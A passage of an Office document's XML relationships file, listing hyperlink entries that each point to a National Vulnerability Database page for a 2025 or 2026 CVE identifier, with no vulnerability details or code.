Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89836" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89841" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89854" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89870" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89873" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89875" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89880" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89882" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89883" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89887" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89888" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89890" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89893" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89894" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89899" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89902" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89903" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89906" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89919" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89920" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89922" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89938" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89940" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89941" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89942" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89961" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89965" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89967" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89979" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89985" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89986" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89988" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89994" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89997" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89998" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90001" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90002" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90003" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90007" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90008" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90009" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90010" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90013" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90014" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90022" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90026" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90027" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90030" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90032" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90043" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90044" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90045" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90046" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90047" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90947" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90948" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90949" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92786" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92816" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14916" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14917" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16432" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20342" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-29811" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31278" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61595" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62997" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73439" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73496" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81210" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85385" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86474" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86585" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87084" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87996" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89060" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90025" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76425" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79639" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82053" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85197" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92465" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92616" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92779" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-14871" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-1168" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13260" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15955" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17615" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18212" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19290" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19534" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19666" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19667" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20247" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20343" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27557" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28935" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28938" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33963" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43789" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45759" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45765" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45766" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45768" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45769" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45770" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46352" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49362" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49363" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53752" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54567" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57098" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57119" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63126" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63128" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64761" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65342" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65378" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65410" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66304" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66307" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67211" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67376" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69852" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69881" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69890" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71330" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72928" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76163" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76442" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77494" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77498" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77499" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77501" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77502" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77692" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77886" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77888" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77889" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77890" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77893" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77895" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79651" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80274" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81265" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81563" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81634" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81665" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81736" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81875" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81876" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82399" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84543" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84544" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84549" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84563" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84598" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84629" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84997" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85189" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85190" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85191" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85195" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85756" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86003" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86043" TargetMode="External" Id="rId653" /><Relationship 